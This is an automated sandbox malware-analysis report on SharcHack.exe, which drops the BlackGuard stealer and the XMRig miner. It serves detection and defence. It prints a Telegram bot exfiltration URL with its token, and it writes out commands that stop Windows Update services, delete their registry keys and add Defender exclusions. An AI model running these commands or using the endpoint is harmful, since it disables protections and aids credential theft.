blackguard | 954f8e8d665f2c7712308dfc7bd71ae47bdc237599b9a13d77b902b4ca8b8884

Analysis

max time kernel
109s
max time network
103s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
02-01-2025 05:06

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

SharcHack.exe
Size

11.4MB
MD5

b8918284fa1e6f12d3341df417a34e49
SHA1

c21af6f52d2a85cda67703ac284bff3d4300d019
SHA256

7418a6094bcaae9522ddd3e12cf119b3baae673013975f6db44ebbee200e83c2
SHA512

b710c1f98ad60160fe4a37fa11fe6dccaccce552c2119b16f9ab50bde932cec4198587d83b9d5bfcc369db5f346f54e37b98eed9dcd86e365ddb4ece1d81fb43
SSDEEP

196608:v/wld79ht+j1M0mWZsE6+YASy10tyDRs8sdFlh+co976:v4ld752M096+YdUGyDRs8jco8

Score

10^/10

blackguard xmrig discovery evasion execution miner persistence spyware stealer upx

Malware Config

Extracted

Family

blackguard

https://api.telegram.org/bot6540906397:AAG08fPgT-V7I17vtz49STaZEuwqXqKshuM/sendMessage?chat_id=5445185021

Signatures

BlackGuard
Infostealer first seen in Late 2021.
stealer blackguard
Blackguard family
blackguard

Modifies security service 2 TTPs 5 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

description	ioc	Process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security	reg.exe

Suspicious use of NtCreateUserProcessOtherParentProcess 17 IoCs

description	pid	Process	procid_target
PID 4552 created 2836	4552	111.exe	54
PID 860 created 2836	860	222.exe	54
PID 4552 created 2836	4552	111.exe	54
PID 4552 created 2836	4552	111.exe	54
PID 4552 created 2836	4552	111.exe	54
PID 860 created 2836	860	222.exe	54
PID 860 created 2836	860	222.exe	54
PID 860 created 2836	860	222.exe	54
PID 4552 created 2836	4552	111.exe	54
PID 1324 created 2836	1324	updater.exe	54
PID 1324 created 2836	1324	updater.exe	54
PID 1324 created 2836	1324	updater.exe	54
PID 1324 created 2836	1324	updater.exe	54
PID 1324 created 2836	1324	updater.exe	54
PID 1324 created 2836	1324	updater.exe	54
PID 5040 created 2836	5040	conhost.exe	54
PID 1324 created 2836	1324	updater.exe	54

Xmrig family
xmrig
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 8 IoCs

miner

resource	yara_rule
behavioral1/memory/3712-363-0x00007FF678CF0000-0x00007FF6794E4000-memory.dmp	xmrig
behavioral1/memory/3712-362-0x00007FF678CF0000-0x00007FF6794E4000-memory.dmp	xmrig
behavioral1/memory/3712-365-0x00007FF678CF0000-0x00007FF6794E4000-memory.dmp	xmrig
behavioral1/memory/3712-367-0x00007FF678CF0000-0x00007FF6794E4000-memory.dmp	xmrig
behavioral1/memory/3712-369-0x00007FF678CF0000-0x00007FF6794E4000-memory.dmp	xmrig
behavioral1/memory/3712-371-0x00007FF678CF0000-0x00007FF6794E4000-memory.dmp	xmrig
behavioral1/memory/3712-373-0x00007FF678CF0000-0x00007FF6794E4000-memory.dmp	xmrig
behavioral1/memory/3712-375-0x00007FF678CF0000-0x00007FF6794E4000-memory.dmp	xmrig

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3752	powershell.exe
3152	powershell.exe
1420	powershell.exe
3772	powershell.exe
3644	powershell.exe
2412	powershell.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	SharcHack.exe
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	VegaStealer_v2.exe

Executes dropped EXE 5 IoCs

pid	Process
960	VegaStealer_v2.exe
4552	111.exe
860	222.exe
2828	v2.exe
1324	updater.exe

Loads dropped DLL 5 IoCs

pid	Process
2828	v2.exe
2828	v2.exe
2828	v2.exe
2828	v2.exe
2828	v2.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
14	freegeoip.app
15	freegeoip.app
22	ip-api.com

Power Settings 1 TTPs 15 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
380	powercfg.exe
4064	powercfg.exe
3616	powercfg.exe
868	cmd.exe
1796	powercfg.exe
5076	powercfg.exe
2596	powercfg.exe
1940	cmd.exe
4924	cmd.exe
3676	powercfg.exe
4960	powercfg.exe
2228	powercfg.exe
3088	powercfg.exe
3896	powercfg.exe
1048	powercfg.exe

Drops file in System32 directory 3 IoCs

description	ioc	Process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 1324 set thread context of 5040	1324	updater.exe	179
PID 1324 set thread context of 3712	1324	updater.exe	185

UPX packed file 9 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/3712-355-0x00007FF678CF0000-0x00007FF6794E4000-memory.dmp	upx
behavioral1/memory/3712-363-0x00007FF678CF0000-0x00007FF6794E4000-memory.dmp	upx
behavioral1/memory/3712-362-0x00007FF678CF0000-0x00007FF6794E4000-memory.dmp	upx
behavioral1/memory/3712-365-0x00007FF678CF0000-0x00007FF6794E4000-memory.dmp	upx
behavioral1/memory/3712-367-0x00007FF678CF0000-0x00007FF6794E4000-memory.dmp	upx
behavioral1/memory/3712-369-0x00007FF678CF0000-0x00007FF6794E4000-memory.dmp	upx
behavioral1/memory/3712-371-0x00007FF678CF0000-0x00007FF6794E4000-memory.dmp	upx
behavioral1/memory/3712-373-0x00007FF678CF0000-0x00007FF6794E4000-memory.dmp	upx
behavioral1/memory/3712-375-0x00007FF678CF0000-0x00007FF6794E4000-memory.dmp	upx

Drops file in Program Files directory 5 IoCs

description	ioc	Process
File created	C:\Program Files\Google\Chrome\updater.exe	111.exe
File created	C:\Program Files\Google\Libs\WR64.sys	updater.exe
File created	C:\Program Files\Google\Libs\g.log	cmd.exe
File created	C:\Program Files\Google\Libs\g.log	cmd.exe
File created	C:\Program Files\Google\Chrome\updater.exe	222.exe

Launches sc.exe 15 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2496	sc.exe
3036	sc.exe
2984	sc.exe
1928	sc.exe
2856	sc.exe
2164	sc.exe
2608	sc.exe
4032	sc.exe
976	sc.exe
2156	sc.exe
4548	sc.exe
4872	sc.exe
2392	sc.exe
4612	sc.exe
2064	sc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	SharcHack.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	VegaStealer_v2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	v2.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	v2.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	v2.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
4664	WMIC.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2828	v2.exe
2828	v2.exe
2828	v2.exe
2828	v2.exe
4552	111.exe
4552	111.exe
860	222.exe
860	222.exe
2412	powershell.exe
3772	powershell.exe
2412	powershell.exe
3772	powershell.exe
4552	111.exe
4552	111.exe
4552	111.exe
4552	111.exe
4552	111.exe
4552	111.exe
860	222.exe
860	222.exe
860	222.exe
860	222.exe
860	222.exe
860	222.exe
3152	powershell.exe
3152	powershell.exe
1420	powershell.exe
1420	powershell.exe
3152	powershell.exe
1420	powershell.exe
860	222.exe
860	222.exe
4552	111.exe
4552	111.exe
2844	powershell.exe
1436	powershell.exe
2844	powershell.exe
1436	powershell.exe
1324	updater.exe
1324	updater.exe
3644	powershell.exe
3644	powershell.exe
1324	updater.exe
1324	updater.exe
1324	updater.exe
1324	updater.exe
1324	updater.exe
1324	updater.exe
3752	powershell.exe
3752	powershell.exe
1324	updater.exe
1324	updater.exe
1324	updater.exe
1324	updater.exe
5040	conhost.exe
5040	conhost.exe
1324	updater.exe
1324	updater.exe
3712	conhost.exe
3712	conhost.exe
3712	conhost.exe
3712	conhost.exe
3712	conhost.exe
3712	conhost.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2828	v2.exe
Token: SeDebugPrivilege	2412	powershell.exe
Token: SeDebugPrivilege	3772	powershell.exe
Token: SeDebugPrivilege	3152	powershell.exe
Token: SeDebugPrivilege	1420	powershell.exe
Token: SeShutdownPrivilege	5076	powercfg.exe
Token: SeCreatePagefilePrivilege	5076	powercfg.exe
Token: SeShutdownPrivilege	3676	powercfg.exe
Token: SeCreatePagefilePrivilege	3676	powercfg.exe
Token: SeShutdownPrivilege	380	powercfg.exe
Token: SeCreatePagefilePrivilege	380	powercfg.exe
Token: SeShutdownPrivilege	4960	powercfg.exe
Token: SeCreatePagefilePrivilege	4960	powercfg.exe
Token: SeShutdownPrivilege	4064	powercfg.exe
Token: SeCreatePagefilePrivilege	4064	powercfg.exe
Token: SeShutdownPrivilege	2228	powercfg.exe
Token: SeCreatePagefilePrivilege	2228	powercfg.exe
Token: SeShutdownPrivilege	2596	powercfg.exe
Token: SeCreatePagefilePrivilege	2596	powercfg.exe
Token: SeShutdownPrivilege	3616	powercfg.exe
Token: SeCreatePagefilePrivilege	3616	powercfg.exe
Token: SeIncreaseQuotaPrivilege	1420	powershell.exe
Token: SeSecurityPrivilege	1420	powershell.exe
Token: SeTakeOwnershipPrivilege	1420	powershell.exe
Token: SeLoadDriverPrivilege	1420	powershell.exe
Token: SeSystemProfilePrivilege	1420	powershell.exe
Token: SeSystemtimePrivilege	1420	powershell.exe
Token: SeProfSingleProcessPrivilege	1420	powershell.exe
Token: SeIncBasePriorityPrivilege	1420	powershell.exe
Token: SeCreatePagefilePrivilege	1420	powershell.exe
Token: SeBackupPrivilege	1420	powershell.exe
Token: SeRestorePrivilege	1420	powershell.exe
Token: SeShutdownPrivilege	1420	powershell.exe
Token: SeDebugPrivilege	1420	powershell.exe
Token: SeSystemEnvironmentPrivilege	1420	powershell.exe
Token: SeRemoteShutdownPrivilege	1420	powershell.exe
Token: SeUndockPrivilege	1420	powershell.exe
Token: SeManageVolumePrivilege	1420	powershell.exe
Token: 33	1420	powershell.exe
Token: 34	1420	powershell.exe
Token: 35	1420	powershell.exe
Token: 36	1420	powershell.exe
Token: SeIncreaseQuotaPrivilege	3152	powershell.exe
Token: SeSecurityPrivilege	3152	powershell.exe
Token: SeTakeOwnershipPrivilege	3152	powershell.exe
Token: SeLoadDriverPrivilege	3152	powershell.exe
Token: SeSystemProfilePrivilege	3152	powershell.exe
Token: SeSystemtimePrivilege	3152	powershell.exe
Token: SeProfSingleProcessPrivilege	3152	powershell.exe
Token: SeIncBasePriorityPrivilege	3152	powershell.exe
Token: SeCreatePagefilePrivilege	3152	powershell.exe
Token: SeBackupPrivilege	3152	powershell.exe
Token: SeRestorePrivilege	3152	powershell.exe
Token: SeShutdownPrivilege	3152	powershell.exe
Token: SeDebugPrivilege	3152	powershell.exe
Token: SeSystemEnvironmentPrivilege	3152	powershell.exe
Token: SeRemoteShutdownPrivilege	3152	powershell.exe
Token: SeUndockPrivilege	3152	powershell.exe
Token: SeManageVolumePrivilege	3152	powershell.exe
Token: 33	3152	powershell.exe
Token: 34	3152	powershell.exe
Token: 35	3152	powershell.exe
Token: 36	3152	powershell.exe
Token: SeIncreaseQuotaPrivilege	3152	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3736 wrote to memory of 960	3736	SharcHack.exe	84
PID 3736 wrote to memory of 960	3736	SharcHack.exe	84
PID 3736 wrote to memory of 960	3736	SharcHack.exe	84
PID 3736 wrote to memory of 4552	3736	SharcHack.exe	85
PID 3736 wrote to memory of 4552	3736	SharcHack.exe	85
PID 3736 wrote to memory of 860	3736	SharcHack.exe	86
PID 3736 wrote to memory of 860	3736	SharcHack.exe	86
PID 960 wrote to memory of 2828	960	VegaStealer_v2.exe	87
PID 960 wrote to memory of 2828	960	VegaStealer_v2.exe	87
PID 960 wrote to memory of 2828	960	VegaStealer_v2.exe	87
PID 212 wrote to memory of 2392	212	cmd.exe	118
PID 212 wrote to memory of 2392	212	cmd.exe	118
PID 212 wrote to memory of 4032	212	cmd.exe	119
PID 212 wrote to memory of 4032	212	cmd.exe	119
PID 1940 wrote to memory of 5076	1940	cmd.exe	120
PID 1940 wrote to memory of 5076	1940	cmd.exe	120
PID 4024 wrote to memory of 3036	4024	cmd.exe	121
PID 4024 wrote to memory of 3036	4024	cmd.exe	121
PID 4924 wrote to memory of 3676	4924	cmd.exe	122
PID 4924 wrote to memory of 3676	4924	cmd.exe	122
PID 212 wrote to memory of 2984	212	cmd.exe	123
PID 212 wrote to memory of 2984	212	cmd.exe	123
PID 1940 wrote to memory of 380	1940	cmd.exe	124
PID 1940 wrote to memory of 380	1940	cmd.exe	124
PID 4924 wrote to memory of 4960	4924	cmd.exe	125
PID 4924 wrote to memory of 4960	4924	cmd.exe	125
PID 4024 wrote to memory of 1928	4024	cmd.exe	126
PID 4024 wrote to memory of 1928	4024	cmd.exe	126
PID 1940 wrote to memory of 4064	1940	cmd.exe	127
PID 1940 wrote to memory of 4064	1940	cmd.exe	127
PID 4024 wrote to memory of 976	4024	cmd.exe	129
PID 4024 wrote to memory of 976	4024	cmd.exe	129
PID 212 wrote to memory of 4612	212	cmd.exe	128
PID 212 wrote to memory of 4612	212	cmd.exe	128
PID 4924 wrote to memory of 2228	4924	cmd.exe	130
PID 4924 wrote to memory of 2228	4924	cmd.exe	130
PID 1940 wrote to memory of 3616	1940	cmd.exe	131
PID 1940 wrote to memory of 3616	1940	cmd.exe	131
PID 4924 wrote to memory of 2596	4924	cmd.exe	132
PID 4924 wrote to memory of 2596	4924	cmd.exe	132
PID 4024 wrote to memory of 2856	4024	cmd.exe	133
PID 4024 wrote to memory of 2856	4024	cmd.exe	133
PID 212 wrote to memory of 2164	212	cmd.exe	134
PID 212 wrote to memory of 2164	212	cmd.exe	134
PID 4024 wrote to memory of 2156	4024	cmd.exe	135
PID 4024 wrote to memory of 2156	4024	cmd.exe	135
PID 212 wrote to memory of 4284	212	cmd.exe	136
PID 212 wrote to memory of 4284	212	cmd.exe	136
PID 212 wrote to memory of 2604	212	cmd.exe	137
PID 212 wrote to memory of 2604	212	cmd.exe	137
PID 4024 wrote to memory of 1484	4024	cmd.exe	138
PID 4024 wrote to memory of 1484	4024	cmd.exe	138
PID 212 wrote to memory of 4676	212	cmd.exe	139
PID 212 wrote to memory of 4676	212	cmd.exe	139
PID 4024 wrote to memory of 3348	4024	cmd.exe	140
PID 4024 wrote to memory of 3348	4024	cmd.exe	140
PID 212 wrote to memory of 4660	212	cmd.exe	141
PID 212 wrote to memory of 4660	212	cmd.exe	141
PID 4024 wrote to memory of 2828	4024	cmd.exe	142
PID 4024 wrote to memory of 2828	4024	cmd.exe	142
PID 212 wrote to memory of 4348	212	cmd.exe	143
PID 212 wrote to memory of 4348	212	cmd.exe	143
PID 4024 wrote to memory of 996	4024	cmd.exe	145
PID 4024 wrote to memory of 996	4024	cmd.exe	145

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:2836
- C:\Users\Admin\AppData\Local\Temp\SharcHack.exe
  "C:\Users\Admin\AppData\Local\Temp\SharcHack.exe"
  2⤵
  - Checks computer location settings
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3736
- - C:\Users\Admin\AppData\Local\Temp\VegaStealer_v2.exe
    "C:\Users\Admin\AppData\Local\Temp\VegaStealer_v2.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:960
  - - C:\Users\Admin\AppData\Local\Temp\v2.exe
      "C:\Users\Admin\AppData\Local\Temp\v2.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      Checks processor information in registry
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2828
- - C:\Users\Admin\AppData\Local\Temp\111.exe
    "C:\Users\Admin\AppData\Local\Temp\111.exe"
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Executes dropped EXE
    - Drops file in Program Files directory
    - Suspicious behavior: EnumeratesProcesses
    PID:4552
- - C:\Users\Admin\AppData\Local\Temp\222.exe
    "C:\Users\Admin\AppData\Local\Temp\222.exe"
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Executes dropped EXE
    - Drops file in Program Files directory
    - Suspicious behavior: EnumeratesProcesses
    PID:860
  - - C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4024
    - - C:\Windows\System32\sc.exe
        
        sc stop UsoSvc
        5⤵
        Launches sc.exe
        
        PID:3036
    - - C:\Windows\System32\sc.exe
        
        sc stop WaaSMedicSvc
        5⤵
        Launches sc.exe
        
        PID:1928
    - - C:\Windows\System32\sc.exe
        
        sc stop wuauserv
        5⤵
        Launches sc.exe
        
        PID:976
    - - C:\Windows\System32\sc.exe
        
        sc stop bits
        5⤵
        Launches sc.exe
        
        PID:2856
    - - C:\Windows\System32\sc.exe
        
        sc stop dosvc
        5⤵
        Launches sc.exe
        
        PID:2156
    - - C:\Windows\System32\reg.exe
        
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
        5⤵
        
        PID:1484
    - - C:\Windows\System32\reg.exe
        
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
        5⤵
        
        PID:3348
    - - C:\Windows\System32\reg.exe
        
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
        5⤵
        
        PID:2828
    - - C:\Windows\System32\reg.exe
        
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
        5⤵
        
        PID:996
    - - C:\Windows\System32\reg.exe
        
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
        5⤵
        
        PID:3020
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2412
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3772
- C:\Windows\System32\cmd.exe
